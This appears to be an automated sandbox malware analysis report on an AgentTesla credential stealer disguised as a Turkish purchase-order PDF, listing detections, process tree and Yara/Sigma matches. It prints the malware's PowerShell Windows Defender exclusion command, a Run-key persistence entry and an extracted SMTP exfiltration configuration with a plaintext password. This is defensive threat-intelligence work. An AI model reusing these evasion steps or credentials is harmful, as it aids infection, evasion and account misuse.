Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe

Overview

General Information

Sample name:baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
renamed because original name is a hash value
Original sample name:baymarhavuzculuk Satnalma Siparii 20230331,pdf.exe
Analysis ID:1446058
MD5:b90266d6b73db4f10b1cc8f90a81a4aa
SHA1:9422dd5935c7299da1c6c8b7b5e0e9e89743ddfb
SHA256:b5e9a3a112c889e9afaa48926ed0bf9474fb430cc99dff8915192877f58d5efe
Tags:AgentTeslaexegeoTUR
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe (PID: 7192 cmdline: "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe" MD5: B90266D6B73DB4F10B1CC8F90A81A4AA)
    • powershell.exe (PID: 7332 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ctsdvwT.exe (PID: 7644 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: B90266D6B73DB4F10B1CC8F90A81A4AA)
    • ctsdvwT.exe (PID: 7752 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: B90266D6B73DB4F10B1CC8F90A81A4AA)
  • ctsdvwT.exe (PID: 7952 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: B90266D6B73DB4F10B1CC8F90A81A4AA)
    • ctsdvwT.exe (PID: 8020 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: B90266D6B73DB4F10B1CC8F90A81A4AA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.saralgumruk.com", "Username": "syilmaz@saralgumruk.com", "Password": "Srl--789789_"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.1325496333.00000000044B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000005.00000002.1325496333.00000000044B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000C.00000002.1545932299.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000C.00000002.1545932299.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000A.00000002.1486766690.00000000043BF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 20 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            13.2.ctsdvwT.exe.409f328.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              13.2.ctsdvwT.exe.409f328.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                13.2.ctsdvwT.exe.409f328.4.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x318da:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x3194c:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x319d6:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x31a68:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x31ad2:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x31b44:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x31bda:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x31c6a:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                10.2.ctsdvwT.exe.43f9d68.5.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  10.2.ctsdvwT.exe.43f9d68.5.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 36 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", ParentImage: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, ParentProcessId: 7192, ParentProcessName: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", ProcessId: 7332, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, ProcessId: 7348, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctsdvwT
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", ParentImage: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, ParentProcessId: 7192, ParentProcessName: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", ProcessId: 7332, ProcessName: powershell.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 185.81.155.88, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, Initiated: true, ProcessId: 7348, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 59154
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", ParentImage: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, ParentProcessId: 7192, ParentProcessName: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe", ProcessId: 7332, ProcessName: powershell.exe

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 13.2.ctsdvwT.exe.409f328.4.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.saralgumruk.com", "Username": "syilmaz@saralgumruk.com", "Password": "Srl--789789_"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeReversingLabs: Detection: 36%
                    Multi AV Scanner detection for submitted file
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeReversingLabs: Detection: 36%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeJoe Sandbox ML: detected
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeCode function: 4x nop then jmp 05E98B16h5_2_05E98C6F
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 4x nop then jmp 066F802Eh10_2_066F8187
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 4x nop then jmp 0609802Eh13_2_06098187

                    Networking

                    barindex
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.9:59154 -> 185.81.155.88:587
                    Source: Joe Sandbox ViewASN Name: RADORETR RADORETR
                    Source: global trafficTCP traffic: 192.168.2.9:59154 -> 185.81.155.88:587
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: mail.saralgumruk.com
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002D39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.saralgumruk.com
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1320959148.00000000028D2000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.1485685529.0000000003102000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000D.00000002.1568438809.0000000002DE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1325496333.00000000044B1000.00000004.00000800.00020000.00000000.sdmp, baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1325496333.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.1486766690.00000000043BF000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000C.00000002.1545932299.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ctsdvwT.exe, 0000000D.00000002.1575415406.000000000409F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, gmBpn1ecBmQ.cs.Net Code: Dm1L2C2
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.raw.unpack, gmBpn1ecBmQ.cs.Net Code: Dm1L2C2
                    Installs a global keyboard hook
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 13.2.ctsdvwT.exe.409f328.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.ctsdvwT.exe.43f9d68.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 13.2.ctsdvwT.exe.40d9f48.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.ctsdvwT.exe.43bf148.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 12.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.ctsdvwT.exe.43f9d68.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 13.2.ctsdvwT.exe.40d9f48.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.ctsdvwT.exe.43bf148.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 13.2.ctsdvwT.exe.409f328.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeCode function: 5_2_0271DC745_2_0271DC74
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeCode function: 5_2_05E955805_2_05E95580
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeCode function: 5_2_05E95F305_2_05E95F30
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeCode function: 5_2_05E93EA85_2_05E93EA8
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeCode function: 5_2_05E9B6B85_2_05E9B6B8
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeCode function: 5_2_05E951485_2_05E95148
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeCode function: 5_2_05E951395_2_05E95139
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeCode function: 5_2_05E93A705_2_05E93A70
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeCode function: 9_2_02AB97609_2_02AB9760
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeCode function: 9_2_02AB4AB09_2_02AB4AB0
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeCode function: 9_2_02AB3E989_2_02AB3E98
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeCode function: 9_2_02AB41E09_2_02AB41E0
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeCode function: 9_2_02ABCDB09_2_02ABCDB0
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeCode function: 9_2_061717689_2_06171768
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeCode function: 9_2_06172F089_2_06172F08
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeCode function: 9_2_061709C09_2_061709C0
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeCode function: 9_2_061780E29_2_061780E2
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeCode function: 9_2_061780E89_2_061780E8
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeCode function: 9_2_061728209_2_06172820
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_0158DC7410_2_0158DC74
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_05AFC00010_2_05AFC000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_05AFCBC010_2_05AFCBC0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_05AF042810_2_05AF0428
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_05AF466310_2_05AF4663
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_05AF3CA010_2_05AF3CA0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_05AFBA5010_2_05AFBA50
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_066FAE4810_2_066FAE48
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_066F3EA810_2_066F3EA8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_066F5F3010_2_066F5F30
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_066F558010_2_066F5580
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_066F3A7010_2_066F3A70
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_066F514810_2_066F5148
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_066F513910_2_066F5139
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_00F6963812_2_00F69638
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_00F6C8C012_2_00F6C8C0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_00F64AB012_2_00F64AB0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_00F63E9812_2_00F63E98
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_00F641E012_2_00F641E0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_05E1044812_2_05E10448
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_05E111F012_2_05E111F0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_05E12D9012_2_05E12D90
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_05E122A812_2_05E122A8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_05E17F8212_2_05E17F82
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 12_2_05E17F8812_2_05E17F88
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 13_2_0131DC7413_2_0131DC74
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 13_2_0609AE4813_2_0609AE48
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 13_2_06093EA813_2_06093EA8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 13_2_06095F3013_2_06095F30
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 13_2_0609558013_2_06095580
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 13_2_06093A7013_2_06093A70
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 13_2_0609513913_2_06095139
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 13_2_0609514813_2_06095148
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 14_2_0120963814_2_01209638
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 14_2_0120C98814_2_0120C988
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 14_2_01204AB014_2_01204AB0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 14_2_01208E5C14_2_01208E5C
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 14_2_01203E9814_2_01203E98
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 14_2_012041E014_2_012041E0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 14_2_060E044814_2_060E0448
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 14_2_060E11F014_2_060E11F0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 14_2_060E6C4C14_2_060E6C4C
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 14_2_060E2D9014_2_060E2D90
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 14_2_060E22A814_2_060E22A8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 14_2_060E7F7A14_2_060E7F7A
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 14_2_060E7F8814_2_060E7F88
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 14_2_060E6C4014_2_060E6C40
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 14_2_060E8C7214_2_060E8C72
